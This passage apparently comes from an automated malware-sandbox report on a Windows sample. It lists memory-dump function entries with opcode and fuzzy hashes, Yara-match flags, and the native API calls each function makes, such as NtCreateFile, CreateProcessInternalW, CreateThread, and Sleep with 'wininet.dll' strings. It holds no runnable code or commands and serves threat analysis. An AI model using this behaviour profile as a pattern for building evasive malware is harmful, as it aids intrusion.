                      • Opcode Fuzzy Hash: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                      • Instruction Fuzzy Hash: FAE08C319006809FCF12DB48CA50F5EBBF6FF84B00F140408A5095F720C724EC00CB00
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                      • Instruction ID: 927f33e2fa5deae2046d488497613c79400f2f018439fbf096b42fcc38c14f8e
                      • Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                      • Instruction Fuzzy Hash: DCD0C935352980CFD617CB4CC954B0533A4FB44B40FC50490E940CB722E72CD940CA00
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                      • Instruction ID: bd5e8e638c52f2ecc5eaf2578ed34defc96362c34a171c390ff41e315ae68777
                      • Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                      • Instruction Fuzzy Hash: 99D0A9314011819AEB82AB24CA387683BB2BF00B8CF58306988030EB52C33A8A0AC604
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                      • Instruction ID: 7dbee2969f4053718137fa957fd7199414d8e1ef3c77e98f1d66b600b571f8d0
                      • Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                      • Instruction Fuzzy Hash: C2C08C70280A11ABEB222F20CD02B403AA1BB10B02F4400A0A300DA0F0DF78D801EA00
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                      • Instruction ID: 2f7d4568ad6095e056e5bc80b47cdca1b2b6f7fc4f4d5650ed5c2203a5ad65b2
                      • Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                      • Instruction Fuzzy Hash: 8FC01232080248BBCB226F81CC00F067F2AEBA4B60F008014BA080B5608632E970EA88
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                      • Instruction ID: 42d546f33d33bde5ae5a56cdc1bf779854b7eed7089a962814f6638ec3196db5
                      • Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                      • Instruction Fuzzy Hash: 86C04C32180648BBC7126E45DD01F557B6AE7A4B60F154025B6040A5618976ED61D59C
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                      • Instruction ID: cc5e1e7bd2b32c7ef4ad752f7b2eb433703fd619be59dd81c5033bbd6af65b30
                      • Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                      • Instruction Fuzzy Hash: 26C08C32080248BBC712AA45CD00F117B2AE7A0B60F000020F6040A6618A32E860D588
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                      • Instruction ID: 9e0ca016e1dc891b630efe16394c83fd2108061da7d4e98304f8b616548ba18c
                      • Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                      • Instruction Fuzzy Hash: 57C08CB01411805BEB2A970CCE30B303A91AB49608F88019CEB01296A3C368A802D208
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                      • Instruction ID: 873e1a32259812205de4aa9e6b9506a031bbd8d8287174eb442229629daabc80
                      • Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                      • Instruction Fuzzy Hash: 77C02B70150440FBD7152F30CD01F157254F700F61F64035C7220456F0DE289C00E104
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                      • Instruction ID: 9263b7b35dc5c96dccd475275d5197581f661376c0bde7fb83e4afc9ffab3c56
                      • Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                      • Instruction Fuzzy Hash: 49B092363119408FCF16DF28C480B1533E4FB44A40B8400D0E400CBA21D329E8008900
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                      • Instruction ID: b19373cefe9989480268cb850507d9644d7f1f7b3d8cb5f47c9a85409e88019f
                      • Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                      • Instruction Fuzzy Hash: 41B092328104418BCF06AB40CA10B197332AB40650F0544949002279208229AC01CA50
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 4daa18d86fb035e80cf578624b0c123ebf7a0bf41404a5abc4612d15e4f73d78
                      • Instruction ID: 6ba179e8db29523badb7aaa0d7a0992a4c8d92bb3cf3271b48836704a1291a8e
                      • Opcode Fuzzy Hash: 4daa18d86fb035e80cf578624b0c123ebf7a0bf41404a5abc4612d15e4f73d78
                      • Instruction Fuzzy Hash: DA9002A120140403E14069994C056070109ABD0342F51C411A2055555ECA698C517175
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: ed9f1a997581a26454cf7ed05b3a8225f832c4a1926b10968ed7a6c9ca5de342
                      • Instruction ID: 1df0e60ac55d9a0ad12bd007528b9fde91f7c1774b666385966e587e532da214
                      • Opcode Fuzzy Hash: ed9f1a997581a26454cf7ed05b3a8225f832c4a1926b10968ed7a6c9ca5de342
                      • Instruction Fuzzy Hash: 6D9002A121100042E104659948057070149ABE1241F51C412A2145554CC5698C616165
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 001244e9d65371d23a2ac804870c8b91f8101baecda47feaa2d94b3a668cecff
                      • Instruction ID: 2d4ebce7e9dea323dba25b777313216d9f0758877e90b675a450ef6e80612011
                      • Opcode Fuzzy Hash: 001244e9d65371d23a2ac804870c8b91f8101baecda47feaa2d94b3a668cecff
                      • Instruction Fuzzy Hash: BB9002A1601140435540B5994C054075119BBE1341391C521A0445560CC6A88855A2A5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 016BFDFA
                      Strings
                      • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 016BFE01
                      • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 016BFE2B
                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                      • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                      • API String ID: 885266447-3903918235
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Executed Functions

                      APIs
                      • NtCreateFile.NTDLL(00000060,00000000,.z`,02C74BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02C74BB7,007A002E,00000000,00000060,00000000,00000000), ref: 02C7A3AD
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.547165223.0000000002C60000.00000040.00020000.sdmp, Offset: 02C60000, based on PE: false
                      Yara matches
                      Similarity
                      • API ID: CreateFile
                      • String ID: .z`
                      • API String ID: 823142352-1441809116
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • NtReadFile.NTDLL(02C74D72,5EB65239,FFFFFFFF,02C74A31,?,?,02C74D72,?,02C74A31,FFFFFFFF,5EB65239,02C74D72,?,00000000), ref: 02C7A455
                      Memory Dump Source
                      • Source File: 00000010.00000002.547165223.0000000002C60000.00000040.00020000.sdmp, Offset: 02C60000, based on PE: false
                      Yara matches
                      Similarity
                      • API ID: FileRead
                      • String ID:
                      • API String ID: 2738559852-0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • NtClose.NTDLL(02C74D50,?,?,02C74D50,00000000,FFFFFFFF), ref: 02C7A4B5
                      Memory Dump Source
                      • Source File: 00000010.00000002.547165223.0000000002C60000.00000040.00020000.sdmp, Offset: 02C60000, based on PE: false
                      Yara matches
                      Similarity
                      • API ID: Close
                      • String ID:
                      • API String ID: 3535843008-0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      Memory Dump Source
                      • Source File: 00000010.00000002.548146108.0000000003620000.00000040.00000001.sdmp, Offset: 03620000, based on PE: true
                      • Associated: 00000010.00000002.549767787.000000000373B000.00000040.00000001.sdmp
                      • Associated: 00000010.00000002.549823291.000000000373F000.00000040.00000001.sdmp
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      Memory Dump Source
                      • Source File: 00000010.00000002.548146108.0000000003620000.00000040.00000001.sdmp, Offset: 03620000, based on PE: true
                      • Associated: 00000010.00000002.549767787.000000000373B000.00000040.00000001.sdmp Download File
                      • Associated: 00000010.00000002.549823291.000000000373F000.00000040.00000001.sdmp Download File
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: c76c24481d0c8f28320aba608605b1ce051464e25b54e79d3555f95a816251f6
                      • Instruction ID: 5e72dd3334113e6d5d16c963e27f97740eed552789ad62b465ba126a695eb067
                      • Opcode Fuzzy Hash: c76c24481d0c8f28320aba608605b1ce051464e25b54e79d3555f95a816251f6
                      • Instruction Fuzzy Hash: C89002B120104842E540B5594505756000D97D1341F51C022A5054554E87998DD576B5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      Memory Dump Source
                      • Source File: 00000010.00000002.548146108.0000000003620000.00000040.00000001.sdmp, Offset: 03620000, based on PE: true
                      • Associated: 00000010.00000002.549767787.000000000373B000.00000040.00000001.sdmp Download File
                      • Associated: 00000010.00000002.549823291.000000000373F000.00000040.00000001.sdmp Download File
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: bf0af32485b8611a8ce445ddc88732440042460fdc7142c989c6be745375fa8d
                      • Instruction ID: 1ee684955cc6fd8bf722e21727bb1bdf221e3b927389319bfce448082f8a640b
                      • Opcode Fuzzy Hash: bf0af32485b8611a8ce445ddc88732440042460fdc7142c989c6be745375fa8d
                      • Instruction Fuzzy Hash: 989002A134104882E500A5594515B16000DD7E2341F51C026E1054554D8759CC527176
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      Memory Dump Source
                      • Source File: 00000010.00000002.548146108.0000000003620000.00000040.00000001.sdmp, Offset: 03620000, based on PE: true
                      • Associated: 00000010.00000002.549767787.000000000373B000.00000040.00000001.sdmp Download File
                      • Associated: 00000010.00000002.549823291.000000000373F000.00000040.00000001.sdmp Download File
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: 7020f8a96c050ba1353661daf4fd9b0e7eae4e74b42548eb84c86c38860de12c
                      • Instruction ID: de8679b80d8a515a581d531a8d77ecfc221dbb8fa66f9f1816997c94646ac500
                      • Opcode Fuzzy Hash: 7020f8a96c050ba1353661daf4fd9b0e7eae4e74b42548eb84c86c38860de12c
                      • Instruction Fuzzy Hash: 5690027120104853E511A5594605717000D97D1281F91C423A0414558D97968D52B171
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      Memory Dump Source
                      • Source File: 00000010.00000002.548146108.0000000003620000.00000040.00000001.sdmp, Offset: 03620000, based on PE: true
                      • Associated: 00000010.00000002.549767787.000000000373B000.00000040.00000001.sdmp Download File
                      • Associated: 00000010.00000002.549823291.000000000373F000.00000040.00000001.sdmp Download File
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: 74b082615c567adbe3875a7db8403913e572395244134ba25c6adf082616ec64
                      • Instruction ID: ae3b37dc7760b32275a3e40d9f2cb362065e4531170385720003bb4301dd3d06
                      • Opcode Fuzzy Hash: 74b082615c567adbe3875a7db8403913e572395244134ba25c6adf082616ec64
                      • Instruction Fuzzy Hash: 61900261242085926945F5594505517400EA7E1281791C023A1404950C86669C56E671
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      Memory Dump Source
                      • Source File: 00000010.00000002.548146108.0000000003620000.00000040.00000001.sdmp, Offset: 03620000, based on PE: true
                      • Associated: 00000010.00000002.549767787.000000000373B000.00000040.00000001.sdmp Download File
                      • Associated: 00000010.00000002.549823291.000000000373F000.00000040.00000001.sdmp Download File
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: c4f0f2f2db6babfeef1e9eac7dd105b28c652cecd4a7e4cdef1292738e4a480a
                      • Instruction ID: a086f923f85aa5a6da1a0cfe2947e6b9acd260d3de310847973caa3ab8089c12
                      • Opcode Fuzzy Hash: c4f0f2f2db6babfeef1e9eac7dd105b28c652cecd4a7e4cdef1292738e4a480a
                      • Instruction Fuzzy Hash: 3990027120104842E500A9995509656000D97E1341F51D022A5014555EC7A58C917171
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      Memory Dump Source
                      • Source File: 00000010.00000002.548146108.0000000003620000.00000040.00000001.sdmp, Offset: 03620000, based on PE: true
                      • Associated: 00000010.00000002.549767787.000000000373B000.00000040.00000001.sdmp Download File
                      • Associated: 00000010.00000002.549823291.000000000373F000.00000040.00000001.sdmp Download File
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: 753c9910c4d356950d7ce66c104497c76a429d4aae26e60b33a0d0ab2598e311
                      • Instruction ID: 19f0418e0c28a3d62f32f3da33b5e4047a89a41ccc7e71377bd5980fc5d3ec87
                      • Opcode Fuzzy Hash: 753c9910c4d356950d7ce66c104497c76a429d4aae26e60b33a0d0ab2598e311
                      • Instruction Fuzzy Hash: 6790027131118842E510A5598505716000D97D2241F51C422A0814558D87D58C917172
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      Memory Dump Source
                      • Source File: 00000010.00000002.548146108.0000000003620000.00000040.00000001.sdmp, Offset: 03620000, based on PE: true
                      • Associated: 00000010.00000002.549767787.000000000373B000.00000040.00000001.sdmp Download File
                      • Associated: 00000010.00000002.549823291.000000000373F000.00000040.00000001.sdmp Download File
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: 1457f542c4f953270a87c3d9ea1850d80f0936399065dbcfe6157dcdfad3801d
                      • Instruction ID: befa9281c69c59b73da97c2aa7c55d3a751896748b2410d292de66d99b2d93b8
                      • Opcode Fuzzy Hash: 1457f542c4f953270a87c3d9ea1850d80f0936399065dbcfe6157dcdfad3801d
                      • Instruction Fuzzy Hash: 5B90026921304442E580B559550961A000D97D2242F91D426A0005558CCA558C696371
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      Memory Dump Source
                      • Source File: 00000010.00000002.548146108.0000000003620000.00000040.00000001.sdmp, Offset: 03620000, based on PE: true
                      • Associated: 00000010.00000002.549767787.000000000373B000.00000040.00000001.sdmp
                      • Associated: 00000010.00000002.549823291.000000000373F000.00000040.00000001.sdmp
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: 509decc213afeaa23c98d7ca9649415cef91cb3591b4ff088cbdc8fb241ae150
                      • Instruction ID: 8a0d4b400bbe88949d223303225cd9c8ee3fece3faacde5569f13ac8b48aed6d
                      • Opcode Fuzzy Hash: 509decc213afeaa23c98d7ca9649415cef91cb3591b4ff088cbdc8fb241ae150
                      • Instruction Fuzzy Hash: 4C9002712010CC42E510A559850575A000D97D1341F55C422A4414658D87D58C917171
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      Memory Dump Source
                      • Source File: 00000010.00000002.548146108.0000000003620000.00000040.00000001.sdmp, Offset: 03620000, based on PE: true
                      • Associated: 00000010.00000002.549767787.000000000373B000.00000040.00000001.sdmp
                      • Associated: 00000010.00000002.549823291.000000000373F000.00000040.00000001.sdmp
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: 8614f98057509d79fa1611ad488d48b579207240cdc3b57a398d1866e0203d96
                      • Instruction ID: ab7dfcfbac38b742f348f24e48f51f32b73226506785f1a42158233c9bc9bce4
                      • Opcode Fuzzy Hash: 8614f98057509d79fa1611ad488d48b579207240cdc3b57a398d1866e0203d96
                      • Instruction Fuzzy Hash: 8F90027120104C82E500A5594505B56000D97E1341F51C027A0114654D8755CC517571
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      Memory Dump Source
                      • Source File: 00000010.00000002.548146108.0000000003620000.00000040.00000001.sdmp, Offset: 03620000, based on PE: true
                      • Associated: 00000010.00000002.549767787.000000000373B000.00000040.00000001.sdmp
                      • Associated: 00000010.00000002.549823291.000000000373F000.00000040.00000001.sdmp
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: 8c6aac987e010283e3de269a1921c13daa4178905ae163480bc1990f495d8519
                      • Instruction ID: 87011cde2aeeb18f68ac1b2fda710351c59ba017a12d6c071983d9688662b687
                      • Opcode Fuzzy Hash: 8c6aac987e010283e3de269a1921c13daa4178905ae163480bc1990f495d8519
                      • Instruction Fuzzy Hash: 31900475311044431505FD5D0705517004FD7D73D1351C033F1005550CD771CC717171
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      Memory Dump Source
                      • Source File: 00000010.00000002.548146108.0000000003620000.00000040.00000001.sdmp, Offset: 03620000, based on PE: true
                      • Associated: 00000010.00000002.549767787.000000000373B000.00000040.00000001.sdmp
                      • Associated: 00000010.00000002.549823291.000000000373F000.00000040.00000001.sdmp
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: 7246c355d35adc000433573b0f66f1ac5d2064bffc0b0d5b90d3a667c9c9ee7b
                      • Instruction ID: 99070a06da4f98e2bd76650be1ed224a434385d333e22e739de06599749b0802
                      • Opcode Fuzzy Hash: 7246c355d35adc000433573b0f66f1ac5d2064bffc0b0d5b90d3a667c9c9ee7b
                      • Instruction Fuzzy Hash: 929002A1202044435505B5594515626400E97E1241B51C032E1004590DC6658C917175
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • Sleep.KERNELBASE(000007D0), ref: 02C79128
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.547165223.0000000002C60000.00000040.00020000.sdmp, Offset: 02C60000, based on PE: false
                      Yara matches
                      Similarity
                      • API ID: Sleep
                      • String ID: net.dll$wininet.dll
                      • API String ID: 3472027048-1269752229
                      • Opcode ID: 80f3dea136a22cf08f0c3d619b1eb242587387486ad5290936ec8c33ec7540bf
                      • Instruction ID: 0c5fd53fdafb8508aebda71def47060ae341d8a6c22c9cd53e9366bc71fa4d84
                      • Opcode Fuzzy Hash: 80f3dea136a22cf08f0c3d619b1eb242587387486ad5290936ec8c33ec7540bf
                      • Instruction Fuzzy Hash: 76318FB2500644BBC724DF64CC89F67B7B9BB88B00F10811DFA2A6B244D730B660CBA4
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • Sleep.KERNELBASE(000007D0), ref: 02C79128
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.547165223.0000000002C60000.00000040.00020000.sdmp, Offset: 02C60000, based on PE: false
                      Yara matches
                      Similarity
                      • API ID: Sleep
                      • String ID: net.dll$wininet.dll
                      • API String ID: 3472027048-1269752229
                      • Opcode ID: 61a9208caac2684f453be78a52c68bb122c1770684415f40be6ebecb40504796
                      • Instruction ID: 520ae3ca88af747912794f3d398195cc506980bd3bdda000ada464089e4ba4f7
                      • Opcode Fuzzy Hash: 61a9208caac2684f453be78a52c68bb122c1770684415f40be6ebecb40504796
                      • Instruction Fuzzy Hash: EC31E371900740AFC714DF64CC89F6BBBB5BF88704F10815DE629AB245D774A660CBA5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02C63AF8), ref: 02C7A69D
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.547165223.0000000002C60000.00000040.00020000.sdmp, Offset: 02C60000, based on PE: false
                      Yara matches
                      Similarity
                      • API ID: FreeHeap
                      • String ID: .z`
                      • API String ID: 3298025750-1441809116
                      • Opcode ID: 1b626df6caedf882f40b7ae237f517430703a57b1b982f5468cee1054dad5bba
                      • Instruction ID: 7c2c9af9fbc0ddf504cfd822818461dc9ab70b94de1a5de036b7e5e97fb43e30
                      • Opcode Fuzzy Hash: 1b626df6caedf882f40b7ae237f517430703a57b1b982f5468cee1054dad5bba
                      • Instruction Fuzzy Hash: 91F0EDB2204215AFD714DFA8CC48EEB37ADEF88314F118558F88897240C630E900CBA0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02C63AF8), ref: 02C7A69D
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.547165223.0000000002C60000.00000040.00020000.sdmp, Offset: 02C60000, based on PE: false
                      Yara matches
                      Similarity
                      • API ID: FreeHeap
                      • String ID: .z`
                      • API String ID: 3298025750-1441809116
                      • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                      • Instruction ID: e7e8e8a101ee5490edab17c797fb9ed8bd5f178c662cae9a6577641130fb9580
                      • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                      • Instruction Fuzzy Hash: 90E046B2200208ABDB18EF99CC48EAB77ADEF88750F118558FE085B251C631F910CAF0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 02C6836A
                      • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 02C6838B
                      Memory Dump Source
                      • Source File: 00000010.00000002.547165223.0000000002C60000.00000040.00020000.sdmp, Offset: 02C60000, based on PE: false
                      Yara matches
                      Similarity
                      • API ID: MessagePostThread
                      • String ID:
                      • API String ID: 1836367815-0
                      • Opcode ID: 7da48d641a9e3ea2185ecaaee85a03719b6fe5477202d15b4d87b185d03aca29
                      • Instruction ID: a0a9f0c85d4f0d181368fdf2b9e89deaac7d8b0fdeec160b453eda83ae49eb7a
                      • Opcode Fuzzy Hash: 7da48d641a9e3ea2185ecaaee85a03719b6fe5477202d15b4d87b185d03aca29
                      • Instruction Fuzzy Hash: 626192B1900309AFDB24DF64DC89FFB77B9EB48704F10456DE909A7240DB70AA458FA5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 02C6836A
                      • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 02C6838B
                      Memory Dump Source
                      • Source File: 00000010.00000002.547165223.0000000002C60000.00000040.00020000.sdmp, Offset: 02C60000, based on PE: false
                      Yara matches
                      Similarity
                      • API ID: MessagePostThread
                      • String ID:
                      • API String ID: 1836367815-0
                      • Opcode ID: ed9197855c9e2bc34f04d57a03b89565242fe3095d4b4cd67eb906d42238a131
                      • Instruction ID: 1193c41335ba74003cd82227c826c199d7b83ec1e12a447bd335a644aa6d0a68
                      • Opcode Fuzzy Hash: ed9197855c9e2bc34f04d57a03b89565242fe3095d4b4cd67eb906d42238a131
                      • Instruction Fuzzy Hash: B601A771A8022977E720A6949C46FBE776D5B40F55F040115FF04BA1C1E6946A0546F5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 02C6AD62
                      Memory Dump Source
                      • Source File: 00000010.00000002.547165223.0000000002C60000.00000040.00020000.sdmp, Offset: 02C60000, based on PE: false
                      Yara matches
                      Similarity
                      • API ID: Load
                      • String ID:
                      • API String ID: 2234796835-0
                      • Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                      • Instruction ID: fbc5b981e0b21303d3b7ba56a0445c94e28c7e6d6ba8e319cba859c69ce6de40
                      • Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                      • Instruction Fuzzy Hash: 73011EB5D0020DBBDF10DBA4DC85FADB7B9AF54308F1045A5A909A7240FA31EB149B91
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 02C7A734
                      Memory Dump Source
                      • Source File: 00000010.00000002.547165223.0000000002C60000.00000040.00020000.sdmp, Offset: 02C60000, based on PE: false
                      Yara matches
                      Similarity
                      • API ID: CreateInternalProcess
                      • String ID:
                      • API String ID: 2186235152-0
                      • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                      • Instruction ID: becc480032144f3e07647ba24d2f0996d7d43e9481bdd586e388d2ab20df2eb7
                      • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                      • Instruction Fuzzy Hash: 8E0162B2214108BFCB54DF89DC80EEB77ADAF8C754F158258FA0D97255D630E851CBA4
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,02C6F050,?,?,00000000), ref: 02C791EC
                      Memory Dump Source
                      • Source File: 00000010.00000002.547165223.0000000002C60000.00000040.00020000.sdmp, Offset: 02C60000, based on PE: false
                      Yara matches
                      Similarity
                      • API ID: CreateThread
                      • String ID:
                      • API String ID: 2422867632-0
                      • Opcode ID: 5ae1f666e4370ccf60eb3c6adbeb4b46241ef6bb8157a8c6bc5332d8c03f5f28
                      • Instruction ID: 6f0d4a5267e652d7fc9e6e2e0393e1e16ffc9cef85132547bcad3a61e4bd1c2e
